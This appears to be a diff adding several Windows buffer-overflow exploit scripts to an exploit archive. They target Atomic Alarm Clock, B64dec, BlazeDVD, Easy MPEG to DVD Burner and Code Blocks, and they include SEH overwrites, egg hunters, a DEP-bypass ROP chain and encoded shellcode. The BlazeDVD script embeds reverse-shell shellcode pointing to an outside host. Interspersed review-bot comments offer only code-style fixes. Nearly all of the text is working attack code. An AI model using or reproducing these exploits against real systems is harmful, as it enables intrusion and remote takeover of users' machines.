18th byte - \x00 => \x02 +venBlinds += '\xC6\x02' # mov byte [eax], 0x02 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 20th byte - \x00 => \x10 +venBlinds += '\xC6\x10' # mov byte [eax], 0x10 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 22nd byte - \x00 => \x3F +venBlinds += '\xC6\x3F' # mov byte [eax], 0x3F +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 24nd byte - \x00 => \x1F +venBlinds += '\xC6\x1F' # mov byte [eax], 0x1F +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 26th byte - \x00 => \x49 +venBlinds += '\xC6\x49' # mov byte [eax], 0x49 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += 
'\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 28th byte - \x00 => \x02 +venBlinds += '\xC6\x02' # mov byte [eax], 0x02 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 30th byte - \x00 => \xED +venBlinds += '\xC6\xED' # mov byte [eax], 0xED +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 32nd byte - \x00 => \xC3 +venBlinds += '\xC6\xC3' # mov byte [eax], 0xC3 +venBlinds += '\x72' # add [edx], dh +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh +# Jump to the decoded decoder by Returning to the address we saved on the stack +venBlinds += '\xC3' # ret [!] Now we are executing the decoder! 
+ +os_decoder = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds)) + +#badChars = 00 0d 80 82->8e 91->9f +# Custom PopCalc shellcode that avoids the bad characters +fKernel32 = '\x33\xF6' # xor esi, esi +fKernel32 += '\xF7\xE6' # mul esi +fKernel32 += '\x64\x03\x52\x30' # add edx, fs:[edx+30] # EBX = Address_of_PEB +fKernel32 += '\x03\x42\x0C' # add eax, [edx+C] # EBX = Address_of_LDR +fKernel32 += '\x03\x70\x1C' # add esi, [eax+1C] # ESI = 1st entry in InitOrderModuleList / ntdll.dll +fKernel32 += '\xAD' # lodsd # EAX = 2nd entry in InitOrderModuleList / kernelbase.dll +fKernel32 += '\x50' # push eax +fKernel32 += '\x5E' # pop esi +fKernel32 += '\xAD' # lodsd # EAX = 3rd entry in InitOrderModuleList / kernel32.dll +fKernel32 += '\xFF\x70\x08' # push dword ptr [eax+8] # [ESP] = &kernel32 + +gExpotTbl = '\x33\xC9' # xor ecx, ecx +gExpotTbl += '\x33\xF6' # xor esi, esi +gExpotTbl += '\x33\xDB' # xor ebx, ebx +gExpotTbl += '\xF7\xE3' # mul ebx +gExpotTbl += '\x58' # pop eax # EAX = &kernel32 +gExpotTbl += '\x50' # push eax # [ESP] = &kernel32 +gExpotTbl += '\x03\x70\x3C' # add esi, [eax+0x3C] ; ESI = RVA NewEXEHeader +gExpotTbl += '\x03\xF0' # add esi, eax ; ESI = &NewEXEHeader +gExpotTbl += '\x03\x56\x78' # add edx, [esi+0x78] ; EDX = RVA ExportTable +gExpotTbl += '\x03\xD0' # add edx, eax ; EDX = &ExportTable = 763477B0 + +gExpotTbl += '\x03\x5A\x20' # add ebx, [edx+0x20] ; EBX = RVA ExportNameTable +gExpotTbl += '\x03\xD8' # add ebx, eax ; EBX = &ExportNameTable + +gExpotTbl += '\x03\x4A\x24' # add ecx, [edx+0x24] ; ECX = RVA ExportOrdinalTable +gExpotTbl += '\x03\xC8' # add ecx, eax ; ECX = &ExportOrdinalTable +gExpotTbl += '\x51' # push ecx + +gExpotTbl += '\x33\xFF' # xor edi, edi +gExpotTbl += '\x03\x7A\x1C' # add edi, [edx+0x1C] ; EDI = RVA ExportAddrTable +gExpotTbl += '\x03\xF8' # add edi, eax ; EDI = &ExportAddrTable +gExpotTbl += '\x57' # push edi + +fWinExec = '\x68\x57\x69\x6E\x45' # push 0x456E6957 ; EniW +fWinExec += '\x33\xC0' # xor 
eax, eax ; EAX = Counter + +fWinExec += '\x33\xF6' # xor esi, esi +fWinExec += '\x03\xF4' # add esi, esp ; ESI = "WinE" +fWinExec += '\xFC' # cld ; Process strings left to right +fWinExec += '\x50' # push eax +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\x33\xFF' # xor edi, edi +fWinExec += '\x03\x3C\x18' # add edi, [eax+ebx] +fWinExec += '\x58' # pop eax +fWinExec += '\x03\x7C\x24\x0C' # add edi, [esp+0xC] ; EDI = &NthNameString +fWinExec += '\xF3\xA6' # repe cmpsb ; compare [&NthNameString] to "WinExec" +fWinExec += '\x74\x03' # jz found ; If [&NthNameString] == "WinExec" end loop +fWinExec += '\x40' # inc eax ; Counter ++ +fWinExec += '\xEB\xE1' # jmp short searchLoop ; restart loop + +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x03\x4C\x24\x08' # add ecx, [esp+0x8] ; ECX = &ExportOrdinalTable +fWinExec += '\x03\xC8' # add ecx, eax +fWinExec += '\x33\xC0' # xor eax, eax +fWinExec += '\x66\x03\x01' # add ax, [ecx] ; AX = ordinalNumber + +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41\x41\x41\x41' # inc ecx X 4 +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\xFF\x74\x24\x04' # push dword [esp+0x4] +fWinExec += '\x01\x04\x24' # add [esp], eax +fWinExec += '\x5A' # pop edx +fWinExec += '\x33\xDB' # xor ebx, ebx +fWinExec += '\x03\x1A' # add ebx, [edx] ; EBX = RVA WinExec +fWinExec += '\x03\x5C\x24\x0C' # add ebx, [esp+0xC] ; EBX = &WinExec +# Call WinExec( CmdLine, ShowState ); +# CmdLine = "calc.exe" +# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window +callWinExec = '\x33\xC9' # xor ecx, ecx ; clear eax register +callWinExec += '\x51' # push ecx ; string terminator 0x00 for "calc.exe" string +callWinExec += '\x68\x2E\x65\x78\x65' # push 
0x6578652e ; exe. : 6578652e +callWinExec += '\x68\x63\x61\x6C\x63' # push 0x636c6163 ; clac : 636c6163 +callWinExec += '\x33\xC0' # xor eax, eax +callWinExec += '\x03\xC4' # add eax, esp ; save pointer to "calc.exe" string in eax +callWinExec += '\x41' # inc ecx ; uCmdShow SW_SHOWNORMAL = 0x00000001 +callWinExec += '\x51' # push ecx ; uCmdShow - push 0x1 to stack # 2nd argument +callWinExec += '\x50' # push eax ; lpcmdLine - push string address stack # 1st argument +callWinExec += '\xFF\xD3' # call ebx ; Call the WinExec Function + +shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec + +buffer = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode +filler = '\x77'*(9000-len(buffer)) +buffer = buffer+filler + +try: + payload = buffer + f = open(File, 'w') + f.write(payload) + f.close() + print File + " created successfully" +except: + print File + ' failed to create' \ No newline at end of file diff --git a/exploits/windows/local/48317.py b/exploits/windows/local/48317.py new file mode 100755 index 000000000..694417788 --- /dev/null +++ b/exploits/windows/local/48317.py 
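Review bot: The script only runs under Python 2 — the `print File + ...` statements, `'\x90'*((512/2)-...)` relying on integer division, and the str-as-bytes write — but nothing in the header says so, and under Python 3 it fails at parse time. The same undeclared Python-2 dependency applies to 48329.py and 48344.py in this commit. The bare `except:` around the write also hides the actual reason for a failure (permission denied, wrong directory), and `f = open(File, 'w')` leaks the handle if `write` raises; prefer `with open(File, 'wb') as f:` / `    f.write(buffer)` and `except IOError as e:` with the error printed. Binary mode additionally avoids text-mode newline translation on Windows should a 0x0a byte ever end up in the buffer, which the bad-character list does not exclude.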
@@ -0,0 +1,55 @@
+# Exploit Title: B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)
+# Date: 2020-04-13
+# Exploit Author: Andy Bowden
+# Vendor Homepage: http://4mhz.de/b64dec.html
+# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
+# Version: Base64 Decoder 1.1.2
+# Tested on: Windows 10 x86
+
+#Instructions:
+# Run the script to create the Crash.txt file. Copy the contents of the file and paste them into the search box and then click decode.
+
+f = open("crash.txt", "wb")
+
+padding1 = b"ERCDERCD"
+padding1 += b"\x90" * 100
+
+# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
+# cmd=calc.exe exitfunc=thread -f python
+payload = b""
+payload += b"\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+payload += b"\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+payload += b"\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+payload += b"\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+payload += b"\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+payload += b"\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+payload += b"\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+payload += b"\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+payload += b"\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+payload += b"\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+payload += b"\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+payload += b"\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+payload += b"\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+payload += b"\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+payload += b"\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+payload += b"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+payload += b"\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+egghunter = b"\x8B\xFD" # mov edi,ebp
+egghunter += b"\xB8\x45\x52\x43\x44" # mov eax,45525344 ERCD
+egghunter += b"\x47" # inc edi
+egghunter += b"\x39\x07" # cmp dword ptr ds:[edi],eax
+egghunter += b"\x75\xFB" # jne
+egghunter += b"\x39\x07" # cmp dword ptr ds:[edi],eax
+egghunter += b"\x75\xF7" # jne
+egghunter += b"\xFF\xE7" # jmp edi
+
+buf = padding1 + payload
+buf += b"\x90" * (580 - len(padding1 + payload))
+buf += egghunter
+buf += b"\x90" * (620 - len(buf))
+buf += b"\x90\x90\xEB\xCE"
+buf += b"\x86\x1e\x40" #00401e86
+
+f.write(buf)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48329.py b/exploits/windows/local/48329.py
new file mode 100755
index 000000000..68240e330
--- /dev/null
+++ b/exploits/windows/local/48329.py
@@ -0,0 +1,80 @@ +# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH) +# Date: 2020-04-15 +# Exploit Author: areyou1or0 <Busra Demir> +# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html +# Version: 7.0.2 +# Tested on: Windows 7 Pro x86 + +#!/usr/bin/python + +file = "exploit.plf" +offset ="A"*(612-4) +nseh = "\xeb\x1e\x90\x90" +seh = "\x34\x31\x02\x64" +nops = "\x90" * 24 + +# msfvenom -p windows/shell_reverse_tcp LHOST=3D192.168.8.121 LPORT=8888= -f python -e x86/alpha_mixed -b '\x00\x0a\x0d\xff' +shellcode = "" +shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a" +shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37" +shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41" +shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" +shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62" +shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46" +shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b" +shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34" +shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51" +shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64" +shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67" +shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36" +shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61" +shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c" +shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39" +shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c" +shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61" +shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44" +shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d" +shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45" +shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b" 
+shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47" +shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44" +shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52" +shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b" +shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64" +shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72" +shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44" +shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30" +shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56" +shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30" +shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76" +shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f" +shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e" +shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72" +shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52" +shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f" +shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70" +shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35" +shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32" +shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67" +shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33" +shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54" +shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66" +shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36" +shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76" +shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f" +shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33" +shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47" +shellcode += 
"\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58" +shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d" +shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56" +shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b" +shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61" +shellcode += "\x43\x49\x6f\x68\x55\x41\x41" + + + +buffer = offset + nseh + seh + nops + shellcode + +f = open(file,'w') +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48339.py b/exploits/windows/local/48339.py new file mode 100755 index 000000000..355fbea67 --- /dev/null +++ b/exploits/windows/local/48339.py 
@@ -0,0 +1,150 @@ +# Exploit Title: Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP) +# Date: 2020-04-15 +# Exploit Author: Bailey Belisario +# Tested On: Windows 7 Ultimate x64 +# Software Link: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe +# Version: 1.7.11 +# Exploit Length: 1015 Bytes +# Steps : Open application > Register > In Username field paste content of pwn.txt file (Note open this in sublime or vscode) + +# Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass using VirtualProtect() on Local Buffer Overflow +# Exploit used with Python2.7 +#------------------------------------------------------------------------------------------------------------------------------------# +# Bad Characters: \x00\x0a\x0d # +# SEH Offset: 1012 # +# Modules Used: SkinMagic.dll & Easy MPEG to DVD Burner.exe # +#------------------------------------------------------------------------------------------------------------------------------------# + +# Register setup for VirtualProtect() (Bypass DEP) : +#--------------------------------------------------- +# EAX = Points to PUSHAD at time VirtualProtect() is called +# ECX = lpflOldProtect (0x10047d30 as writable location) +# EDX = flNewProtect(0x40) +# EBX = dwSize (0x92) +# ESP = lpAddress (automatic) +# EBP = ReturnTo (ptr to jmp esp) +# ESI = ptr to VirtualProtect() +# EDI = ROP NOP (RETN) + +import struct + +def create_rop_chain(): + + rop_gadgets = [ + + # Put 1 in EDX and decrement to 0 + 0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN + 0x1003629a, # ADD EAX,4 # DEC EDX # JNE SKINMAGIC!SETSKINMENU+0X2F505 (10036295) # POP ESI # RETN + 0x11111111, # Filler + + # Pop the pointer of VirtualProtect into EAX + 0x10037b12, # POP EAX # RETN + 0x1003b268, # ptr to &VirtualProtect() [IAT SkinMagic.dll] + + # Dereference Pointer into EDX then move back to EAX + 0x1001c011, # ADD EDX,DWORD PTR [EAX] # RETN 0x0C + 0x10031772, # MOV EAX,EDX # RETN + 
0x11111111, # Filler + 0x11111111, # Filler + 0x11111111, # Filler + + # Push VP and pop into EBP + 0x1002e17b, # PUSH EAX # PUSH ESP # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x0C + 0x10037b12, # POP EAX # RETN + 0x11111111, # Filler + 0x11111111, # Filler + 0x11111111, # Filler + + # Use this to get to address needed to Pop VP into ESI + 0x1003619e, # POP EAX # POP ESI # RETN + + # Move VP to +12 on stack then push the POP POP RETN + 0x10032485, # MOV DWORD PTR [ESP+0CH],EBP # LEA EBP,DWORD PTR DS:[ESP+0CH] # PUSH EAX # RETN + 0x11111111, # Filler popped + 0x11111111, # Filler popped + + # Set ESI to VP + 0x1002e1ce, # POP ESI # RETN [SkinMagic.dll] + 0x11111111, # Where VP is MOV into + + # Set EBP with POP EBP RETN + 0x1002894f, # POP EBP # RETN [SkinMagic.dll] + 0x1002894f, # skip 4 bytes [SkinMagic.dll] + + # Set EDX (# s -d 0x10000000 L?0x10050000 0000003f <- used to find 3F) + # Clear out EDX, set it to 0x01, find address where DWORD of EAX will be 0x3F, then add to EDX to be 0x40 + 0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN + 0x10037b12, # POP EAX # RETN + 0x1005a0a0, # Address of 3F + 0x10026173, # ADD EDX,DWORD PTR [EAX] # RETN + + # Set EBX to 0x92 assuming EBX is 0, but could work with a decent range of numbers + # Note: This should be at least length of shellcode + 0x100362c6, # XOR EAX,EAX # RETN + 0x10033fb2, # ADD AL,0C9 # RETN + 0x10033fb2, # ADD AL,0C9 # RETN + 0x10035c12, # ADC BL,AL # OR CL,CL # JNE SKINMAGIC!SETSKINMENU+0X2EEDB (10035C6B) # RETN + + # Set ECX to writable location + 0x1003603f, # POP ECX # RETN [SkinMagic.dll] + 0x10047d30, # &Writable location [SkinMagic.dll] + + # Set EDI to ROP NOP + 0x100395c2, # POP EDI # RETN [SkinMagic.dll] + 0x10032982, # RETN (ROP NOP) [SkinMagic.dll] + + # Do PUSHAD and be 1337 + 0x10037654, # POP EAX # RETN + 0xa140acd2, # CONSTANT + 0x100317c8, # ADD EAX,5EFFC883 # RETN + 0x1003248d, # PUSH EAX # RETN + + # Used to jump to ESP + 0x1001cc57, # ptr to 'push esp 
# ret ' [SkinMagic.dll] + ] + return ''.join(struct.pack('<I', _) for _ in rop_gadgets) + +ropChain = create_rop_chain() + +# CALC.EXE for POC +shell = ("\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72" + "\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F" + "\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24" + "\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45" + "\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7") + +# 148 Bytes needed to return to ROP CHAIN +paddingBeginning = "B"*148 + +# NOP Sled needs to be sufficient length, from some math, I came out with a buffer of 444 - len(ROP CHAIN) +nopLen = 444 - len(ropChain) +nopSled = '\x90'*nopLen + +# Padding to SEH needs to consider the 420 bytes remaining - shellcode +paddingMiddleLen = 420 - len(shell) +paddingMiddle = 'B'*paddingMiddleLen + +# 0x004043ee (add esp, 7D4) Stack Pivot 2004 bytes +# This brings total bytes to SEH Offset (1012) + 3 for a total of 1015 bytes +seh = "\xee\x43\x40" + +# Exploit Visualization # +#------------------------# +# BBBBBBBBBBBBBBBBBBBB # +#------------------------# +# ROP CHAIN # +#------------------------# +# NOPS # +#------------------------# +# SHELL CODE # +#------------------------# +# BBBBBBBBBBBBBBBBBBBB # +#------------------------# +# SEH # +#------------------------# + +exploit = paddingBeginning + ropChain + nopSled + shell + paddingMiddle + seh + +file = open("pwn.txt", 'w') +file.write(exploit) +file.close() \ No newline at end of file diff --git a/exploits/windows/local/48344.py b/exploits/windows/local/48344.py new file mode 100755 index 000000000..0fae1bb8c --- /dev/null +++ b/exploits/windows/local/48344.py 
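Review bot: Style: `create_rop_chain` uses `_` as a real loop variable in `''.join(struct.pack('<I', _) for _ in rop_gadgets)`, where `_` conventionally marks an unused value; `return ''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)` reads better. The function also has no docstring; one sentence stating that every address is hard-coded for the SkinMagic.dll build named in the header and that the chain assumes the register state listed above the function would help the next reader. At the end of the hunk `file` shadows the builtin and the text-mode `open("pwn.txt", 'w')` is not closed if `write` raises; `with open("pwn.txt", 'wb') as out:` / `    out.write(exploit)` fixes both.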
@@ -0,0 +1,31 @@ +# Exploit Title: Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE +# Date: 2020-04-17 +# Exploit Author: T3jv1l +# Software Link: https://sourceforge.net/projects/codeblocks/files/Binaries/16.01/Windows/codeblocks-16.01-setup.exe +# Software version: 16.01 + + +buffer="A"*536 #buffer +buffer+="\x61\x41" #POPAD + Aligned +buffer+="\xF2\x41" #POP/POP/RET + +#----------------------Align the eax to point to the shellcode PART ----------------------- +#buffer+="\x90" #NOP +#buffer+="\x6e" #venetian padding +#buffer+="\x05\x37\x13" #add eax, 0x13003700 +#buffer+="\x6e" +#buffer+="\x2d\x36\x13" #sub eax, 0x13003600 +#buffer+="\x6e" #venetian padding +#buffer+="\x50" #push eax +#buffer+="\x6e" #Venetian padding +#buffer+="\xc3" #ret + +#----------------------Shellcode PlaceHOLDER ---------------------------------------------- +#uffer+="\x90"*111 +#buffer+=("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") +buffer+="\xcc\xcc\xcc\xcc" +buffer+="\x90"*(5000-len(buffer)) +f=open('exploit.m3u','w'); +f.write(buffer); +f.close(); +print "[+] File created." \ No newline at end of file diff --git a/exploits/windows/local/48346.py b/exploits/windows/local/48346.py new file mode 100755 index 000000000..b80cee14b --- /dev/null +++ b/exploits/windows/local/48346.py 
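Review bot: Style: the trailing semicolons on `f=open('exploit.m3u','w');`, `f.write(buffer);` and `f.close();` are not Python; `with open('exploit.m3u', 'wb') as f:` / `    f.write(buffer)` replaces all three and closes the file on error. The header is missing the `# Tested on:` line the other entries in this commit carry, so the Windows build the offsets were taken on is unknown. With the alignment stub and shellcode placeholder commented out, the script writes only `\xcc\xcc\xcc\xcc` after the SEH overwrite, so the header should state that this is a crash / INT3 proof-of-concept rather than a working exploit.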
@@ -0,0 +1,97 @@ +# Exploit Title: Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH) +# Exploit Author: Bobby Cooke +# Date: 2020-04-17 +# Vendor: Drive Software Company +# Vendor Site: http://www.drive-software.com +# Software Download: http://www.drive-software.com/download/ataclock.exe +# Tested On: Windows 10 - Pro 1909 (x86) +# Version: Atomic Alarm Clock 6.3 beta +# Recreate: Install > Open > Run Exploit > Open poc.txt & copy to clipboard > Time Zones > Clock1 > click 'Enter display name' textbox > paste buffer + +File = 'poc.txt' + +os_nSEH = '\x41'*(461) +nSEH = '\xeb\x05' # jmp short +2 +SEH = '\x47\x47' # 0x00470047 : pop esi # pop ebx # ret [AtomicAlarmClock.exe] +#{PAGE_EXECUTE_READ} ASLR: False, Rebase: False, SafeSEH: False + +getPC = '\x73' # add [ebx], dh # nop | [EBX] = writable memory +getPC += '\x61' # popad # [ESP] = &Payload +getPC += '\x72' # add [edx], dh # realigns execution for 1 byte opcodes + +ebx2eax = '\x58' # pop eax # EAX = &Payload +ebx2eax += '\x72' # add [edx], dh + +# Ajust EAX to &Decoder +getDecoder = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes +getDecoder += '\x72' # add [edx], dh +getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder +getDecoder += '\x72' # add [edx], dh +getDecoder += '\x50' # push eax # [ESP] = &Decoder +getDecoder += '\x72' # add [edx], dh + +#DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3' +firstHalf = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50' +## 2nd byte - \x00 => \x5F +venBlinds = '\x40\x72\xC6\x5F\x72\x40\x72\x40\x72' +## 4th byte - \x00 => \x33 +venBlinds += '\xC6\x33\x72\x40\x72\x40\x72' +## 6th byte - \x00 => \x33 +venBlinds 